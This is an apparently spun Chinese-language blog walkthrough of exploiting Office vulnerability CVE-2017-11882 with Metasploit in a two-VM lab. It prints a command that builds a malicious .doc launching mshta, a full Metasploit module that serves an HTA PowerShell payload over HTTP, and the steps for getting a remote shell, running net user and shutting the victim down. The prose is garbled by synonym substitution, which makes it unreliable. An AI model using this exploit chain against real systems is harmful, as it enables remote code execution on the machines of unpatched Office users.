CVE-2017-11882漏洞 Msf利用复现

2019-12-14 03:33栏目:操作系统
TAG:

凌晨时候采用了推送的漏洞预先警告,在英特网查找相关新闻看来数不胜数大拿已经开采出生成doc文书档案的脚本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的施用。

 

 

Office隐蔽17年的漏洞CVE_2017_11882测验记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参考小说1:

参谋小说2:

 

POC地址:

 

中间环节现身,msf连接数据库退步的意况,消除方法:

 

1.创造标准

 

 

此地搭建两台设想机举办测验!

 

测量试验机配置音讯:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

第风度翩翩在kali下安装nginx,恐怕tomcat应该也是足以的,首先将转换的doc文件放在/usr/share/nginx/html目录下,方便被攻击的机器获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c "mshta ;; -o cev2.doc

# 将下载好的漏洞模块放在msf率性目录下

root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的源委如下:

##

# This module requires Metasploit:

# Current source:

##

class MetasploitModule  < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})

    super(update_info(info,

      'Name' => 'Microsoft Office Payload Delivery',

      'Description' => %q{

        This module generates an command to place within

        a word document, that when executed, will retrieve a HTA payload

        via HTTP from an web server. Currently have not figured out how

        to generate a doc.

      },

      'License' => MSF_LICENSE,

      'Arch' => ARCH_X86,

      'Platform' => 'win',

      'Targets' =>

        [

          ['Automatic', {} ],

        ],

      'DefaultTarget' => 0,

    ))

  end

  def on_request_uri(cli, _request)

    print_status("Delivering payload")

    p = regenerate_payload(cli)

    data = Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      'win',

      p.encoded,

      'hta-psh',

      { :arch => ARCH_X86, :platform => 'win '}

    )

    send_response(cli, data, 'Content-Type' => 'application/hta')

  end

  def primer

    url = get_uri

    print_status("Place the following DDE in an MS document:")

    print_line("mshta.exe "#{url}"")

  end

 

接下来,这里在动用msfconsole从前,必要先开荒数据库,举例 service postgresql start 

展开数据库之后,步入msfconsole,然后对msf举办初叶化,实行msf init

之后search cve_2017_11882查找漏洞模块,然后遵照【参考作品2】举办安顿,最后exploit 之后运转对 8080 端口的监听,至于为何是8080端口笔者也不太精通啊!

 

2.防患未然,只欠DongFeng

 

以这时候候,只须要在 win7 上经过浏览器的到 cve2.doc文书档案,展开未来,kali中命令行马上呈现已经赢得到了连接,

图片 1

图片 2

session命令获得回答,session -i 【id】创设连接

shell命令可以拿走cmd,试行net user查看顾客

图片 3

图片 4

 

3.实验效果

 

通过这么些漏洞,能够堂而皇之的实践一些命令,举例关机,删除一些文书,搜罗一些系统音讯或许不行有效的

在桌面新建文件夹

图片 5

远程关机

图片 6

即便取获得了命令行,可是经过net user命令能够旁观登入的客户等第是Guest,那就限定了有的亟需权限较高的指令奉行!

与此同临时间这里win7未有设置杀软,作者不明了安装杀软之后word文档会不会被查杀呢?

 

 

0x00 漏洞简单介绍

前年四月十六日,微软颁发了一月份的安全补丁更新,个中比较引人关怀的其实悄然修复了藏匿17年之久的Office远程代码施行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响当下风靡的具有Office版本。攻击者能够选拔漏洞以近日报到的顾客的地位试行任性命令。 由于漏洞影响面较广,漏洞表露后,金睛安全研讨集体持续对漏洞有关攻击事件展开关爱。10月16日,监察和控制到了原来就有漏洞POC在英特网流传,随时飞速对有关样品进行了深入分析。近日该样板举世仅微软杀毒能够检查实验。

  • 漏洞影响版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

版权声明:本文由bob体育app发布于操作系统,转载请注明出处:CVE-2017-11882漏洞 Msf利用复现